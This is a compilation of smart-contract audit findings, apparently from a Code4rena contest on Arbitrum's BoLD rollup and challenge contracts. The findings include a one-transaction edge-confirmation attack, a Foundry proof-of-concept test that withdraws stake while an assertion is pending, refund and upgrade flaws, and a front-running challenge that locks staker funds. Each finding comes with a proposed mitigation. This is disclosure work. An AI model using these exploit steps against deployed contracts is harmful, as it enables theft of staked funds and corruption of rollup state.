The attacker can drill down to NUM_BIGSTEP_LEVEL + 1 by stepping along the lower part of the commitment history and finally create a valid lower child that represents only the lower part of the commitment history, which will pass the validation through oneStepProofEntry.proveOneStep.
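The bisection-and-drill pattern can be sketched with a simplified model. This is illustrative Python, not the contract's API; the plain midpoint rule stands in for the contract's actual mandatory bisection height logic:

```python
# Simplified model of edge bisection: each bisection splits an edge's
# history range [start, end] at a midpoint into a lower and an upper
# child. An attacker who keeps descending into the lower child reaches
# single-step size after a handful of bisections.

def bisect(start, end):
    """Split an edge covering [start, end] into lower/upper children."""
    assert end - start > 1, "single-step edges cannot be bisected"
    mid = (start + end) // 2
    return (start, mid), (mid, end)

# Attacker drills down the lower half until a length-1 (small-step) edge.
edge = (0, 32)
path = [edge]
while edge[1] - edge[0] > 1:
    lower, upper = bisect(*edge)
    edge = lower          # always descend into the lower child
    path.append(edge)

print(edge)               # final small-step edge: (0, 1)
print(len(path) - 1)      # number of bisections needed: 5
```

Because the whole lower-half path is deterministic, an attacker can precompute it and submit every bisection in one transaction.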

But the history commitment for the upper side can be changed/manipulated by the attacker. With only the lower part correct, we practically have our entire assertion confirmed as the correct one.

By providing a valid proof of history commitment inclusion for this lower part, our edge is set as confirmed and totalTimeUnrivaledCache is set to the maximal uint64 value, which signals that we have a correct history.

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L826-L830

All other rival edges (even the valid one) now revert with RivalEdgeConfirmed.

By calling updateTimerCacheByChildren and updateTimerCacheByClaim enough times, as is done in the test function updateTimers, we can have our wrong assertion included as the next correct assertion.

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L506-L511

The correct assertion cannot be approved because only one assertion can be chosen (from the last confirmed one plus a fixed height/number of inbox messages); the other rival assertions are discarded (a rival edge reverts with RivalEdgeConfirmed) once the first one is approved. And by using confirmEdgeByOneStepProof, a malicious user can accomplish this in one transaction.

Note: as a code sample for the PoC, the test testCanConfirmByOneStep can be used. The two main points here are to construct all needed edges in one transaction in such a way that the lower history commitment is included/confirmed on the last edge, and that proveOneStep does not revert for the last small-step edge, which checks that the correct virtual machine is used, from bytes32 cursor = edgeId;:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L798

to store.edges[edgeId].endHistoryRoot

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L822

Tools Used

Manual review

Recommended Mitigation Steps

One recommendation for solving this problem is to not allow one single account to play the "game" of rivaling edges by having a require that the rival edge is created by another account. This will enforce that playing this "game" is done in turns not just by one account. Something like this :

// for this to work we need a new `createdByStaker` ChallengeEdge attribute for all edge levels, not just level zero (edge.staker)
 function add(EdgeStore storage store, ChallengeEdge memory edge) internal returns (EdgeAddedData memory) {
    ...
            if (firstRival == 0) {
            store.firstRivals[mutualId] = UNRIVALED;
        } else if (firstRival == UNRIVALED) {
+           require(store.edges[eId].createdByStaker != msg.sender, "not allowed");
            store.firstRivals[mutualId] = eId;
        } else {
            // after we've stored the first rival we dont need to keep a record of any
            // other rival edges - they will all have a zero time unrivaled
        }
    ...
 }

If this is not enough, and the attacker's financial gain outweighs losing the bond for creating edges with two accounts, then limiting the number of rival edges that can be created in one transaction could also prevent a single attacker (with two different accounts) from resolving the last edge in one transaction. Other non-malicious stakers could monitor such behavior and interfere with the attacker's intention. Something like this (in the same add function as before):

uint created = store.createdIn[block.number][edgeId];
created += 1;
if (created > LIMIT_NUMBER_OF_EDGES_IN_ONE_TRANSACTION) {
    revert("number of max rival in block");
}
store.createdIn[block.number][edgeId] = created;

Assessed type

Other

Logical flaw in `_setBufferConfig` function that can lead to unexpected behavior and potentially incorrect state updates.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L851-L856

Vulnerability details

Impact

The _setBufferConfig function (src/bridge/SequencerInbox.sol:847-865) contains flawed clamping logic.

Consider the following lines (src/bridge/SequencerInbox.sol:851-855):

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
}
if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

The problem is that these two conditions are not mutually exclusive, so the second condition can override the first condition's assignment.

For example, if buffer.bufferBlocks is initially 0 and bufferConfig_.threshold is greater than bufferConfig_.max, the first condition will set buffer.bufferBlocks to bufferConfig_.max. The second condition will then immediately set buffer.bufferBlocks to bufferConfig_.threshold, overriding the previous assignment and leaving the value above the configured maximum.

This behavior is likely unintended and could lead to unexpected results.

Proof of Concept

The purpose of the _setBufferConfig function is to update the buffer configuration based on the provided bufferConfig_ parameters. However, the two conditional statements that update the buffer.bufferBlocks value have overlapping conditions, which can result in unintended behavior.

Here's a breakdown of the issue:

The first condition buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max checks if the current buffer.bufferBlocks value is either zero or greater than the new bufferConfig_.max value. If this condition is true, it sets buffer.bufferBlocks to bufferConfig_.max.

The second condition buffer.bufferBlocks < bufferConfig_.threshold checks if the current buffer.bufferBlocks value is less than the new bufferConfig_.threshold value. If this condition is true, it sets buffer.bufferBlocks to bufferConfig_.threshold.

The problem arises when bufferConfig_.threshold is greater than bufferConfig_.max. In this case, the second condition can override the assignment made by the first condition, leading to an incorrect state update.

For example, consider the following scenario:

Initial state: buffer.bufferBlocks = 0
New configuration: bufferConfig_.max = 50, bufferConfig_.threshold = 100
In this scenario, the first condition buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max will be true, and buffer.bufferBlocks will be set to bufferConfig_.max = 50.

However, the second condition buffer.bufferBlocks < bufferConfig_.threshold will also be true (since 50 < 100), and buffer.bufferBlocks will be overwritten with bufferConfig_.threshold = 100.

This behavior is likely unintended, as it leaves buffer.bufferBlocks above the configured maximum (bufferConfig_.max).

The impact of this issue can be significant, as it can lead to incorrect state updates and potentially cause the contract to behave unexpectedly in certain scenarios. This could have implications for the overall functionality and security of the contract, especially if the buffer.bufferBlocks value is used in other parts of the contract logic.

To illustrate the concept further, here's an example of how the code could be modified to address the issue:

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
} else if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

By using an else if statement instead of separate if statements, the conditions are evaluated in the correct order, and the assignment of buffer.bufferBlocks will be consistent with the intended behavior.
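The divergence between the two variants can be checked with a small model. This is plain Python mirroring only the clamp order, not the contract code:

```python
# Minimal model of the two clamping variants in _setBufferConfig.
# With two independent `if`s, the threshold clamp can override the max
# clamp whenever threshold > max; the else-if variant keeps the value
# at max.

def set_buffer_independent(buffer_blocks, max_, threshold):
    if buffer_blocks == 0 or buffer_blocks > max_:
        buffer_blocks = max_
    if buffer_blocks < threshold:
        buffer_blocks = threshold
    return buffer_blocks

def set_buffer_else_if(buffer_blocks, max_, threshold):
    if buffer_blocks == 0 or buffer_blocks > max_:
        buffer_blocks = max_
    elif buffer_blocks < threshold:
        buffer_blocks = threshold
    return buffer_blocks

# With threshold <= max the two variants agree:
print(set_buffer_independent(0, 100, 50))   # 100
print(set_buffer_else_if(0, 100, 50))       # 100

# With threshold > max they diverge:
print(set_buffer_independent(0, 50, 100))   # 100, exceeds max
print(set_buffer_else_if(0, 50, 100))       # 50
```

The model confirms the two variants only differ when threshold exceeds max, which is exactly the problematic configuration.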

Tools Used

VS Code
src/bridge/SequencerInbox.sol:847-865

Recommended Mitigation Steps

Combine the two conditions into a single if statement with appropriate logic:

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
} else if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

This way, the conditions are evaluated in the correct order, and the assignment of buffer.bufferBlocks will be consistent with the intended behavior.

Assessed type

Error

Stakers may not be refunded during rollup upgrade

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/BOLDUpgradeAction.sol#L341-L363
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L274-L279

Vulnerability details

Impact

During the process of upgrading the rollup contract, there exists a potential issue where the number of stakers exceeds the limit expected by the protocol. The function responsible for refunding existing stakers, then pausing and upgrading the old rollup, uses a check to ensure the staker count does not exceed 50. However, the rollup itself does not include any preventative measure to keep the number of stakers below this limit when new stakes are created via RollupCore.createNewStake(). As a result, if the number of stakers exceeds 50, only the first 50 stakers will be force-refunded, while the rest may not receive their refunds.

While the expectation is that the number of stakers will not get close to this number, nothing prevents it from happening. Stakers beyond the first 50 may not receive their refunds during the upgrade process, leading to potential financial losses and dissatisfaction among affected stakeholders. Failure to ensure fair treatment of all stakers could erode trust in the smart contract system and damage the project's reputation within the community.

Proof of Concept

The provided code snippet illustrates the logic for handling the upgrade process and force-refunding the stakers. It shows how stakerCount is capped at 50 if it exceeds that number:

    /// @dev    Refund the existing stakers, pause and upgrade the current rollup to
    ///         allow them to withdraw after pausing
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
 @>         stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }
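The effect of the cap can be illustrated with a short sketch. This is illustrative Python only; refund mechanics are reduced to list indexing:

```python
# Sketch of the hard cap in cleanupOldRollup: only the first 50 staker
# indices are ever visited, so stakers beyond that are silently skipped
# and never force-refunded.

def cleanup(stakers, cap=50):
    refunded = []
    for i in range(min(len(stakers), cap)):
        refunded.append(stakers[i])
    return refunded

stakers = [f"staker{i}" for i in range(60)]
refunded = cleanup(stakers)
skipped = [s for s in stakers if s not in refunded]

print(len(refunded))  # 50
print(len(skipped))   # 10 stakers left unrefunded
```

With 60 stakers, the last 10 are never processed by the loop and must rely on withdrawing manually after the upgrade, if that path remains available to them.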

Tools Used

Manual review

Recommended Mitigation Steps

Implementing an upper bound on the number of stakers when creating a new stake in the RollupCore::createNewStake() function can help mitigate the risk of exceeding the staker limit during rollup upgrades.

Assessed type

Invalid Validation

Incorrect check in `requireInactiveStaker` allows validators to withdraw their stakes for pending assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L573

Vulnerability details

Impact

Validators can withdraw their stakes while their assertions are still pending.

Proof of Concept

In the BoLD rollup, validators are allowed to withdraw their assets only when they are inactive, meaning they are not part of any current assertion. This is checked in the requireInactiveStaker function as follows:

function requireInactiveStaker(address stakerAddress) internal view {
    require(isStaked(stakerAddress), "NOT_STAKED");
    // A staker is inactive if
    // a) their last staked assertion is the latest confirmed assertion
    // b) their last staked assertion have a child
    bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
    bool isLatestConfirmed = lastestAssertion == latestConfirmed();
    bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
    require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
}

It assumes that a staker is inactive whenever their latest assertion has a child, which is wrong.
Here's an example diagram that shows the case:
(Diagram: "Withdraw logic")

As shown in the diagram, the validator of Assertion1 can withdraw their stake even though the assertion is still pending.
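The flawed check and the fixed one can be contrasted in a minimal model. This is illustrative Python; the field names are simplifications of the contract's AssertionNode storage:

```python
# Minimal model of the inactive-staker check. Under the current logic a
# staker whose latest assertion merely has a child is treated as
# inactive, even if that assertion is still pending.
from dataclasses import dataclass

@dataclass
class Assertion:
    status: str              # "Pending" or "Confirmed"
    first_child_block: int   # > 0 once a child exists

def is_inactive_current(a, is_latest_confirmed):
    # current logic: a child alone is enough
    return is_latest_confirmed or a.first_child_block > 0

def is_inactive_fixed(a, is_latest_confirmed):
    # fixed logic: the assertion must also be confirmed
    return is_latest_confirmed or (
        a.first_child_block > 0 and a.status == "Confirmed"
    )

# Assertion1 is pending, but Assertion2 was built on top of it.
a1 = Assertion(status="Pending", first_child_block=100)

print(is_inactive_current(a1, False))  # True, withdrawal allowed
print(is_inactive_fixed(a1, False))    # False, withdrawal blocked
```

The fixed variant matches the mitigation proposed below: a child only makes the staker inactive once the staked assertion itself is confirmed.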

Here's a test case to show that withdrawal is possible while the assertion is still in progress (can be added to Rollup.t.sol):

function _createNewState() internal returns (AssertionState memory afterState, bytes32 inboxAcc) {
    uint256 sequencerInboxCount = userRollup.bridge().sequencerMessageCount();

    afterState.machineStatus = MachineStatus.FINISHED;
    afterState.globalState.bytes32Vals[0] = keccak256(abi.encodePacked("BLOCK_HASH", uint256(sequencerInboxCount))); // blockhash
    afterState.globalState.bytes32Vals[1] = keccak256(abi.encodePacked("SEND_ROOT", uint256(sequencerInboxCount))); // sendroot
    afterState.globalState.u64Vals[0] = uint64(sequencerInboxCount); // inbox count
    afterState.globalState.u64Vals[1] = 0; // pos in msg

    inboxAcc = userRollup.bridge().sequencerInboxAccs(sequencerInboxCount - 1);

    _createNewBatch();
} 

function testAuditWithdrawDuringAssertion() public {
    AssertionState memory s0;
    s0.machineStatus = MachineStatus.FINISHED;

    (AssertionState memory s1, bytes32 acc1) = _createNewState();

    bytes32 a1Hash = RollupLib.assertionHash({
        parentAssertionHash: genesisHash,
        afterState: s1,
        inboxAcc: acc1
    });

    AssertionInputs memory assertion = AssertionInputs({
        beforeStateData: BeforeStateData({
            sequencerBatchAcc: bytes32(0),
            prevPrevAssertionHash: bytes32(0),
            configData: ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: s1.globalState.u64Vals[0]
            })
        }),
        beforeState: s0,
        afterState: s1
    });

    // Create 1st assertion
    vm.prank(validator1);
    userRollup.newStakeOnNewAssertion({
        tokenAmount: BASE_STAKE,
        assertion: assertion,
        expectedAssertionHash: a1Hash,
        withdrawalAddress: validator1
    });
    vm.stopPrank();

    // Preparation for 2nd assertion
    (AssertionState memory s2, bytes32 acc2) = _createNewState();

    bytes32 a2Hash = RollupLib.assertionHash({
        parentAssertionHash: a1Hash,
        afterState: s2,
        inboxAcc: acc2
    });

    assertion = AssertionInputs({
        beforeStateData: BeforeStateData({
            sequencerBatchAcc: acc1,
            prevPrevAssertionHash: genesisHash,
            configData: ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: s2.globalState.u64Vals[0]
            })
        }),
        beforeState: s1,
        afterState: s2
    });

    // Move the time forward
    vm.roll(block.number + 75);

    // Create 2nd assertion
    vm.prank(validator2);
    userRollup.newStakeOnNewAssertion({
        tokenAmount: BASE_STAKE,
        assertion: assertion,
        expectedAssertionHash: a2Hash,
        withdrawalAddress: validator2Withdrawal
    });
    vm.stopPrank();

    // Validator 1 can withdraw
    vm.prank(validator1);
    userRollup.returnOldDeposit();
    vm.prank(validator1);
    userRollup.withdrawStakerFunds();

    assertEq(token.balanceOf(validator1), 1 ether);
}

Tools Used

Manual Review, Foundry

Recommended Mitigation Steps

When the last staked assertion has a child, the check should also validate that the assertion is confirmed.

function requireInactiveStaker(address stakerAddress) internal view {
    require(isStaked(stakerAddress), "NOT_STAKED");
    // A staker is inactive if
    // a) their last staked assertion is the latest confirmed assertion
    // b) their last staked assertion have a child
    bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
    bool isLatestConfirmed = lastestAssertion == latestConfirmed();
    AssertionNode storage assertion = getAssertionStorage(lastestAssertion);
    bool haveChild = assertion.firstChildBlock > 0;
    bool isConfirmed = assertion.status == AssertionStatus.Confirmed;
    require(isLatestConfirmed || (haveChild && isConfirmed), "STAKE_ACTIVE");
}

Assessed type

Context

Participants who didn't deposit into edge challenge manager can still get a refund

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L429

Vulnerability details

Impact

If staking is enabled after having been disabled for some time, all participants who had their edges confirmed while it was disabled will be able to refund themselves, even though they never staked any amount in the first place.

Proof of Concept

An example to demonstrate the issue:

  • A new edge challenge manager is deployed with staking disabled.
  • Bob creates an edge challenge for a correct assertion.
  • Since staking is disabled, Bob won't transfer any stake amount.
	if (address(st) != address(0) && sa != 0) {

EdgeChallengeManager.sol:L429

  • Bob has his edge confirmed.
  • Bob doesn't call refundStake immediately but decides to wait.
  • After some time, the protocol enables staking.
  • Bob now calls refundStake.
  • Bob receives the stake amount although he never staked any in the beginning.
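The mitigation can be sketched as follows. This is illustrative Python; the per-edge record stands in for the suggested per-participant flag, and none of the names are the contract's actual storage:

```python
# Record at creation time exactly what stake was collected for each
# edge, and refund that recorded amount instead of whatever the current
# configuration says.

class ChallengeManager:
    def __init__(self, stake_amount):
        self.stake_amount = stake_amount  # 0 means staking disabled
        self.edges = {}                   # edge_id -> amount staked

    def create_edge(self, edge_id):
        # remember what was actually collected at creation
        self.edges[edge_id] = self.stake_amount

    def refund_stake(self, edge_id):
        # pay out what was recorded, not the current config
        return self.edges.pop(edge_id)

cm = ChallengeManager(stake_amount=0)  # deployed with staking disabled
cm.create_edge("bob")
cm.stake_amount = 100                  # staking enabled later
refund = cm.refund_stake("bob")
print(refund)                          # 0: Bob gets nothing back
```

Because the refund reads the amount recorded at creation, enabling staking later cannot be exploited by edges created while it was disabled.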

Tools Used

Manual analysis

Recommended Mitigation Steps

A flag should be stored for each participant indicating whether they actually staked or not.

Assessed type

Other

`cleanupOldRollup()` reverts due to premature out of bounds

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L341-L363

Vulnerability details

Impact

cleanupOldRollup() reads stakerCount from the old rollup, then loops over that many addresses, capped at 50 if there are more than 50 stakers.

  • Rollup.stakerCount() gets the number of stakers
  • Rollup.getStakerAddress() gets the staker address from the _stakerList array
  • Rollup.forceRefundStaker() makes the staker's stake withdrawable and then deletes the staker

However, deleting a staker shrinks the array from the right, while incrementing the loop index skips addresses from the left.

Proof of Concept

        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);

            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }

By increasing the index i and fetching the next staker address, the loop will run out of bounds, since the array is shrinking in the OLD_ROLLUP contract.

This is not an issue with the old rollup, but with the loop depicted above.

Tools Used

Manual review, Josephdara

Recommended Mitigation Steps

Always read the same (current) index in the loop, and only advance that index when the staker at it is in a challenge (currentChallenge is not zero) and therefore not removed:

uint64 j;
for (uint64 i = 0; i < stakerCount; i++) {
    address stakerAddr = ROLLUP_READER.getStakerAddress(j);

    OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
    if (staker.isStaked && staker.currentChallenge == 0) {
        address[] memory stakersToRefund = new address[](1);
        stakersToRefund[0] = stakerAddr;

        IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
    } else {
        j++;
    }
}
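The suggested two-index loop can be exercised against a model of the old rollup's swap-and-pop staker list. This is illustrative Python; refund side effects are reduced to list surgery:

```python
# Simulation of the suggested loop: keep reading index j, and only
# advance j when the staker at j was *not* removed. The helper mirrors
# deleteStaker's swap-and-pop behavior in the old RollupCore.

def force_refund(staker_list, addr):
    """Swap-and-pop delete: move the last element into the gap."""
    i = staker_list.index(addr)
    staker_list[i] = staker_list[-1]
    staker_list.pop()

stakers = ["a", "b", "c", "d"]
in_challenge = {"b"}                 # "b" cannot be force-refunded

refunded = []
j = 0
for _ in range(len(stakers)):        # snapshot of the original count
    addr = stakers[j]
    if addr not in in_challenge:
        refunded.append(addr)
        force_refund(stakers, addr)  # list shrinks; index j now holds
                                     # the element swapped from the end
    else:
        j += 1                       # skip past the challenged staker

print(sorted(refunded))              # ['a', 'c', 'd']
print(stakers)                       # ['b'], only the challenged staker left
```

In this example every refundable staker is processed without reading past the end of the shrinking list; only the challenged staker remains.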

Assessed type

Error

Two correct assertion chains could possibly happen which breaks a core invariant in BoLD

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L236

Vulnerability details

Impact

anyTrustFastConfirmer is supposed to be set only on an AnyTrust chain; it can force-confirm any pending assertion. This feature allows committee members (a multi-sig) to confirm assertions more quickly.

For this reason, deadline, prev, and challenge validations are skipped, while other validations (e.g. parentAssertionHash, confirmState, and that assertionHash is currently pending) still apply. These are done in confirmAssertionInternal.

However, it doesn't check the status of the assertion's sibling (rival assertion), which allows confirming the intended assertion even if it has a confirmed sibling. This should never happen, as it creates two correct assertion chains; in other words, we would get two confirmed assertions that share the same parent. This breaks a core invariant in BoLD: at any point in time, only one assertion chain can be correct.

Proof of Concept

Assume we have the following assertion chain

A -- B -- C

C is confirmed.

anyTrustFastConfirmer wants to confirm a new assertion under B; let's call it D.

So we would have

 A -- B -- C
       \-- D

anyTrustFastConfirmer will call fastConfirmNewAssertion, which does the following:

  • It requires expectedAssertionHash to be supplied.
        // Must supply expectedAssertionHash to fastConfirmNewAssertion
        require(expectedAssertionHash != bytes32(0), "EXPECTED_ASSERTION_HASH");

RollupUserLogic.sol:L278

  • It checks for prevAssertion existence
getAssertionStorage(prevAssertion).requireExists();

RollupUserLogic.sol:L286

  • If the assertion to be created does not exist, it creates a new one; otherwise, it skips this part.
        if (status == AssertionStatus.NoAssertion) {
            // If not exists, we create the new assertion
            (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash);

RollupUserLogic.sol:L288

  • As the last step, it calls fastConfirmAssertion, which checks that the caller is the anyTrustFastConfirmer, then calls confirmAssertionInternal, skipping the validations that are normally done.

  • If we examine confirmAssertionInternal, we find that it has only two checks:

    • it checks if the assertion exists and is pending.
     		// Check that assertion is pending, this also checks that assertion exists
     		require(assertion.status == AssertionStatus.Pending, "NOT_PENDING");

    RollupCore.sol:L243-L245

    • it validates data against the assertionHash pre-image.

As noticed, there is no check on whether a sibling is already confirmed. Thus, we would end up with two confirmed siblings, which breaks a core invariant in BoLD.

Tools Used

Manual analysis

Recommended Mitigation Steps

Check whether another child is already confirmed and revert if so. This is recommended to prevent breaking the invariant. If confirming the assertion anyway is desired, remove the confirmation of the other confirmed child instead.
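A sketch of the recommended sibling check. This is illustrative Python; the tree model is a simplification of the rollup's assertion storage:

```python
# Before fast-confirming an assertion, check whether its parent already
# has a confirmed child. If so, confirming a second child would create
# two confirmed assertion chains, so revert.

class AssertionTree:
    def __init__(self):
        self.status = {}     # assertion -> "Pending" | "Confirmed"
        self.parent = {}     # assertion -> parent assertion

    def add(self, node, parent):
        self.status[node] = "Pending"
        self.parent[node] = parent

    def fast_confirm(self, node):
        p = self.parent[node]
        siblings = [n for n, pp in self.parent.items()
                    if pp == p and n != node]
        if any(self.status[s] == "Confirmed" for s in siblings):
            raise ValueError("sibling already confirmed")
        self.status[node] = "Confirmed"

t = AssertionTree()
t.add("C", parent="B")
t.add("D", parent="B")
t.status["C"] = "Confirmed"   # C is already the confirmed child of B

try:
    t.fast_confirm("D")
except ValueError as e:
    print(e)                  # sibling already confirmed
```

With this guard, D stays pending and the invariant of a single confirmed chain is preserved.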

Assessed type

Other

Malicious user can create a challenge to lock staker funds during upgrade

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L341

Vulnerability details

Impact

A malicious user can create a challenge to lock staker funds during the upgrade.

Proof of Concept

To upgrade the rollup contract, the steps are:

  1. Deploy the BOLDUpgradeAction.sol contract.
  2. Have the upgrade executor delegatecall BOLDUpgradeAction.sol to trigger the upgrade.

During the upgrade, a function that cleans out some old state is called first:

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            // strange, what is the purpose of this check?
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;
                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);

First, the old rollup contract is paused.

Then, if the staker is staked and there is no active challenge, the code triggers forceRefundStaker:

if (staker.isStaked && staker.currentChallenge == 0) {
    address[] memory stakersToRefund = new address[](1);
    stakersToRefund[0] = stakerAddr;
    IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
}

Finally, the code upgrades the rollup to one that allows validators to withdraw even while the old rollup is paused.

The problem is that the old rollup never gets unpaused/resumed.

If there is an ongoing challenge during the upgrade window, the function below will not be called for that staker:

  IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);

  1. If there is an ongoing challenge, the staker cannot withdraw their funds.
  2. While the contract is paused, the ongoing challenge cannot be resolved by calling the old rollup's completeChallenge function.
  3. Even though the rollup is upgraded to allow validators to withdraw funds while paused, the ongoing challenge still cannot be resolved.

Because of the unresolved challenge, the staker's funds are locked.

Sponsor confirms that the contract IMPL_PATCHED_OLD_ROLLUP_USER comes from this PR:

https://github.com/OffchainLabs/nitro-contracts/pull/48/files

The whenNotPaused modifier is removed from the following functions in the IMPL_PATCHED_OLD_ROLLUP_USER contract:

returnOldDeposit
reduceDeposit
withdrawStakerFunds

If a staker wants to withdraw funds from the old rollup contract, they need to call withdrawStakerFunds.

But before calling withdrawStakerFunds, the validator must first call reduceDeposit / returnOldDeposit to increment the withdrawable fund amount.

Calling these two functions, however, requires that the staker has no ongoing challenge:

https://github.com/OffchainLabs/nitro-contracts/blob/90037b996509312ef1addb3f9352457b8a99d6a6/src/rollup/RollupUserLogic.sol#L616

  /**
     * @notice Verify that the given address is staked and not actively in a challenge
     * @param stakerAddress Address to check
     */
    function requireUnchallengedStaker(address stakerAddress) private view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        require(currentChallenge(stakerAddress) == NO_CHAL_INDEX, "IN_CHAL");
    }

I think the severity is high because a user can put up some funds to intentionally challenge a staker, frontrunning the upgrade, in order to DoS the staker's withdrawal.
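The deadlock can be captured in a minimal state model. This is illustrative Python; the function names mirror the contracts, but the logic is reduced to the two relevant guards:

```python
# While paused, completeChallenge reverts; while the challenge is
# unresolved, the withdrawal path reverts. Neither side can make
# progress, so the challenged staker's funds stay locked.

class OldRollup:
    def __init__(self):
        self.paused = True                      # paused by cleanupOldRollup
        self.current_challenge = {"alice": 7}   # nonzero challenge index

    def complete_challenge(self, staker):
        if self.paused:
            raise RuntimeError("Pausable: paused")
        self.current_challenge[staker] = 0

    def return_old_deposit(self, staker):
        # patched to drop whenNotPaused, but still challenge-gated
        if self.current_challenge.get(staker, 0) != 0:
            raise RuntimeError("IN_CHAL")
        return "withdrawable"

r = OldRollup()
errors = []
for action in (lambda: r.complete_challenge("alice"),
               lambda: r.return_old_deposit("alice")):
    try:
        action()
    except RuntimeError as e:
        errors.append(str(e))

print(errors)  # ['Pausable: paused', 'IN_CHAL']
```

Both exits fail: the challenge cannot complete while paused, and the deposit cannot be returned while the challenge is open, which is exactly the lock described above.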

Whether this finding is in scope may be debatable. From the contest readme:

https://github.com/code-423n4/2024-05-arbitrum-foundation?tab=readme-ov-file#automated-findings--publicly-known-issues

Any issues whose root cause exists in nitro-contracts@77ee9de is considered out of scope but may be eligible for our bug bounty.

While one root cause is that the new IMPL_PATCHED_OLD_ROLLUP_USER does not remove the whenNotPaused modifier from the completeChallenge function, another root cause is that the upgrade contract does not unpause/resume the old rollup after the upgrade.

